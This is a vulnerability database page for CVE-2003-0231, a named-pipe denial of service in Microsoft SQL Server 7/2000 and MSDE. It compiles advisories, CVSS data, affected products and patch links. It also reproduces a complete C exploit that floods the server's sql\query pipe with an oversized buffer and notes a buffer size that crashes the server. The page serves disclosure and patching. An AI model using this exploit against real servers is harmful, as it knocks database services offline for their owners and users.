CVE-2003-0231
CVSS 5.0
Published: 2003-08-27 00:00:00
Last revised: 2008-09-10 15:18:19

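[Original] Microsoft SQL Server 7, 2000, and MSDE allows local or remote authenticated users to cause a denial of service (crash or hang) via a long request to a named pipe.


[CNNVD] Microsoft SQL Server Remote Denial of Service Vulnerability (MS03-031) (CNNVD-200308-199)

        
        Microsoft SQL Server is a large database system developed and maintained by Microsoft.
        Microsoft SQL Server has a flaw in its handling of overly long named pipe requests; a remote attacker can exploit this vulnerability to carry out a denial of service attack against the database service.
        Microsoft SQL Server supports SQL queries over a named pipe. This pipe allows write access to the "Everyone" group and can therefore be accessed by any local or remote user without authentication. Sending an oversized request to this pipe (the size depends on the service pack level) can cause the service to stop responding. The effect varies with the service pack level:
        SQL Server 2000 pre-SP3:
        The SQL service crashes and must be restarted.
        SQL Server 2000 SP3:
        The SQL service appears normal (no abnormal CPU or memory usage) but cannot respond to any requests. The service also cannot be stopped, and the host must be restarted to restore normal operation.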
        

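- CVSS (Base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause reduced performance or interruptions in resource availability]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]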

- CPE (Affected platforms and products)

cpe:/a:microsoft:sql_server:2000:sp3  Microsoft SQLServer 2000 Service Pack 3
cpe:/a:microsoft:sql_server:2000::desktop_engine
cpe:/a:microsoft:sql_server:2000:sp1  Microsoft SQLServer 2000 Service Pack 1
cpe:/a:microsoft:sql_server:2000:sp3a  Microsoft SQLServer 2000 Service Pack 3a
cpe:/a:microsoft:data_engine:1.0  Microsoft data_engine 1.0
cpe:/a:microsoft:sql_server:7.0:sp4  Microsoft SQL Server 7.0 Service Pack 4
cpe:/a:microsoft:sql_server:7.0:sp1  Microsoft SQL Server 7.0 Service Pack 1
cpe:/a:microsoft:sql_server:2000:sp2  Microsoft SQLServer 2000 Service Pack 2
cpe:/a:microsoft:sql_server:7.0:sp3  Microsoft SQL Server 7.0 Service Pack 3
cpe:/a:microsoft:sql_server:7.0:sp2  Microsoft SQL Server 7.0 Service Pack 2
cpe:/a:microsoft:sql_server:2000  Microsoft SQL Server 2000
cpe:/a:microsoft:sql_server:7.0  Microsoft SQLServer 7.0

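- OVAL (Technical details for detection)

oval:org.mitre.oval:def:299  SQL Server Named Pipe Denial of Service
*OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definition.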

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0231
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0231
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-199
(Official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/918652
(UNKNOWN)  CERT-VN  VU#918652
http://www.microsoft.com/technet/security/bulletin/MS03-031.asp
(UNKNOWN)  MS  MS03-031
http://www.atstake.com/research/advisories/2003/a072303-2.txt
(UNKNOWN)  ATSTAKE  A072303-2

- Vulnerability information

Microsoft SQL Server Remote Denial of Service Vulnerability (MS03-031)
Medium severity  Other
2003-08-27 00:00:00 2006-09-01 00:00:00
Local
        
        

- Bulletins and patches

        Vendor patch:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS03-031) and corresponding patches for this issue:
        MS03-031: Cumulative Patch for Microsoft SQL Server (Q815495)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS03-031.asp

        Patch downloads:
        Microsoft SQL Server 7.0:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=FE5B0892-A5C9-44C2-9B42-0D291E9C1636&displaylang=en

        Microsoft SQL 2000 32-bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=9814AE9D-BD44-40C5-ADD3-B8C99618E68D&displaylang=en

        Microsoft SQL 2000 64-bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=72336508-057A-4E86-8F2E-CB1BD3A6A44B&displaylang=en

- Vulnerability information (22957)

Microsoft SQL Server 7.0/2000, MSDE Named Pipe Denial Of Service Vulnerability (EDBID:22957)
windows dos
2003-07-23 Verified
0 refdom
N/A
source: http://www.securityfocus.com/bid/8274/info

Microsoft SQL Server and the Microsoft Data Engine have been reported prone to a denial of service attack.

Any local or remote user, who can authenticate and is part of the Everyone Group, may trigger a denial of service condition in an affected SQL Server.

It has been reported that, if a remote attacker sends an unusually large request to a named pipe, the SQL Server will become unresponsive.

////////////////////////////////////////////////////////////////////////////////
//      
//      exp for Microsoft SQL Server DoS(MS03-031)
//
//      By		  : refdom
//		Email	  : refdom@xfocus.org
//		Home Page : http://www.xfocus.org
//
////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   // strlen, memset
#include <windows.h>


void Usage()
{
	printf("******************************************\n");
	printf("exp for Microsoft SQL Server DoS(MS03-031)\n\n");
	printf("\t Written by Refdom\n");
	printf("\t Email: refdom@xfocus.org\n");
	printf("\t Homepage: www.xfocus.org\n\n");
	printf("Usage: DOSMSSQL.exe server buffersize\n");
	printf("eg: SQLScanner.exe 192.168.0.1 9000\n\n");
	printf("The buffersize depends on service pack level.\n");
	printf("I test it on my server: windows 2000, mssqlserver no sp.\n");
	printf("when buffersize is 9000, the server can be crashed.\n");
	printf("\n");
	printf("*******************************************\n\n");
}


int main(int argc, char* argv[])
{
	char lpPipeName[50];
	char *lpBuffer = NULL;
	unsigned long ulSize = 0;

	BOOL bResult;
	DWORD dwWritten = 0, dwMode;
	HANDLE hPipe;

	Usage();

	printf("Starting...\n");

	if (argc != 3)
		goto Exit0;
	
	if (strlen(argv[1]) < 20)
	{
		sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
	}
	else
	{
		printf("Error!server\n");
		goto Exit0;
	}

	ulSize= atol(argv[2]);

	lpBuffer = (char*)malloc(ulSize + 2);
	if (NULL == lpBuffer)
	{
		printf("malloc error!\n");
		goto Exit0;
	}

	memset(lpBuffer, 0, ulSize + 2);
	memset(lpBuffer, 'A', ulSize);
	*lpBuffer = '\x12';
	*(lpBuffer + 1) = '\x01';
	*(lpBuffer + 2) = '\x00';
	
	printf("Connecting Server...\n");

	hPipe = CreateFile(lpPipeName, 
					GENERIC_READ | GENERIC_WRITE,
					0,
					NULL,
					OPEN_EXISTING,
					0,
					NULL);
	if (INVALID_HANDLE_VALUE == hPipe)
	{
		printf("Error!Connect server!%d\n", GetLastError());
		goto Exit0;
	}

   dwMode = PIPE_READMODE_MESSAGE; 
   bResult = SetNamedPipeHandleState( 
      hPipe,    // pipe handle 
      &dwMode,  // new pipe mode 
      NULL,     // don't set maximum bytes 
      NULL);    // don't set maximum time 
   if (!bResult)
   {
		printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
		goto Exit0;
   }

	bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);

	if (!bResult)
	{
		printf("\n\tError!WriteFile.%d\n\n", GetLastError());
		printf("When see the error message, the target may be crashed!!\n\n");
		goto Exit0;
	}

Exit0:
	
	return 0;
}		

- Vulnerability information (F31428)

Atstake Security Advisory 03-07-23.2 (PacketStormID:F31428)
2003-07-24 00:00:00
Atstake,Andreas Junestam  atstake.com
advisory
CVE-2003-0231

Atstake Security Advisory A072303-2 - By sending a large request to a named pipe used by the Microsoft SQL Server, an attacker can render the service unresponsive. Under some circumstances, the host has to be restarted to recover from this situation.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                             @stake Inc.
                           www.atstake.com 

                          Security Advisory

 
Advisory Name: Microsoft SQL Server DoS
 Release Date: 07/23/2003
  Application: Microsoft SQL Server 7, 2000, MSDE
     Platform: Windows NT/2000/XP
     Severity: Denial of Service
       Author: Andreas Junestam (andreas@atstake.com)
Vendor Status: Microsoft has patch available
CVE Candidate: CAN-2003-0231
    Reference: www.atstake.com/research/advisories/2003/a072303-2.txt


Overview

Microsoft SQL Server supports named pipes as one way of communicating
with the server. This named pipe allows any user to connect and send
data to it. By sending a large request, an attacker can render the
service unresponsive. Under some circumstances, the host has to be
restarted to recover from this situation.


Detailed Description

Microsoft SQL Server supports SQL queries over a named pipe. This
pipe allows write access to the group "Everyone" and is therefore
accessible to anyone that can authenticate, local or remote. By
sending a large request to this pipe (size depends on service pack
level), the service can be rendered unresponsive. The behavior of
the service depends upon the service pack level.

SQL Server 2000 pre-SP3:
The SQL Server service crashes. A restart of the service recovers
from the situation.

SQL Server 2000 SP3:
The SQL Server service appears to be functioning normally (no abnormal
CPU or memory usage), but it is unresponsive to any type of
requests. It is also impossible to stop the service and the only way
to recover from the situation is to restart the host.

As with most SQL Server issues MSDE is affected.  MSDE is
included in many Microsoft and non-Microsoft products. A list
of products that includes MSDE is here:

http://www.sqlsecurity.com/DesktopDefault.aspx?tabindex=10&tabid=13


Vendor Response

Microsoft was contacted on 01/28/2003

Vendor has a bulletin and a patch available:

http://www.microsoft.com/technet/security/bulletin/MS03-031.asp


Recommendation

Install the vendor patch.

Disable named pipes as a SQL Server protocol by using the SQL
Server Network Utility.


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

  CAN-2003-0231


@stake Vulnerability Reporting Policy:
http://www.atstake.com/research/policy/

@stake Advisory Archive:
http://www.atstake.com/research/advisories/

PGP Key:
http://www.atstake.com/research/pgp_key.asc

Copyright 2003 @stake, Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBPx75Pke9kNIfAm4yEQIHMQCeOJEDixeR/pv4oLrPXlXotZwiDMUAn1Ea
BAyScxbEHPoXDHHma1VFKaa/
=2lzX
-----END PGP SIGNATURE-----


    

- Vulnerability information

2299
Microsoft SQL Server Named Pipe Handling Request Remote DoS
Local Access Required, Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- Vulnerability description

Microsoft SQL Server contains a flaw that may allow a remote denial of service. The issue is triggered when an overly long SQL query is sent to a named pipe. This pipe allows write access to the group "Everyone" and is therefore accessible to anyone that can authenticate, local or remote. Microsoft SQL Server 2000 pre-SP3 will stop responding, and the service needs to be restarted in order to answer requests again. SQL Server 2000 SP3 will appear to function normally but will become unresponsive to any type of request; a restart of the host is needed to recover because it is impossible to stop the service.

- Timeline

2003-07-23 2003-01-28
2003-07-23 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- Related references

- Vulnerability author

- Vulnerability information

Microsoft SQL Server / MSDE Named Pipe Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 8274
No Yes
2003-07-23 12:00:00 2009-07-11 10:56:00
Discovery is credited to Andreas Junestam of @Stake.

- Affected program versions

Microsoft SQL Server 2000 Desktop Engine
+ Akiva WebBoard 6.1
+ Microsoft Access 2000
+ Microsoft Application Center 2000
+ Microsoft BizTalk Server 2000 Developer Edition
+ Microsoft BizTalk Server 2000 Enterprise Edition
+ Microsoft BizTalk Server 2000 Standard Edition
+ Microsoft BizTalk Server 2002 Developer Edition
+ Microsoft BizTalk Server 2002 Enterprise Edition
+ Microsoft Office 2000
+ Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio Enterprise Network Tools
+ Microsoft Visual FoxPro 6.0
+ Microsoft Visual Studio 6.0
+ Microsoft Visual Studio .NET Academic Edition 0
+ Microsoft Visual Studio .NET Enterprise Architect Edition
+ Microsoft Visual Studio .NET Enterprise Developer Edition
+ Microsoft Visual Studio .NET Professional Edition
+ SmartMax Software MailMax 5.0
+ Veritas Software Backup Exec for Windows Servers 9.0
Microsoft SQL Server 2000 SP3a
Microsoft SQL Server 2000 SP3
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
Microsoft SQL Server 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0
Microsoft SQL Server 7.0 SP4
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0 SP3
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0 SP2
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0 SP1
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0
- Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Data Engine (MSDE) 1.0
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.0.1
+ Centennial UK Ltd Centennial Discovery 4.4
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0
+ Gerber Technology WebPDM 3.9
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.0
- Microsoft Access 2000
- Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
- Microsoft Visual Studio 6.0
+ PowerQuest ControlCenter ST 2.0
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Trend Micro Control Manager 2.5
+ Trend Micro Damage Cleanup Server 1.0
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Websense Reporter 6.3.1


- Exploit

The following exploit is available:

- Solution

The vendor has released a fix to address this issue.


Microsoft SQL Server 2000 SP3

Microsoft Data Engine (MSDE) 1.0

Microsoft SQL Server 2000 Desktop Engine

Microsoft SQL Server 7.0 SP4

Microsoft SQL Server 2000 SP3a

- Related references

 

 
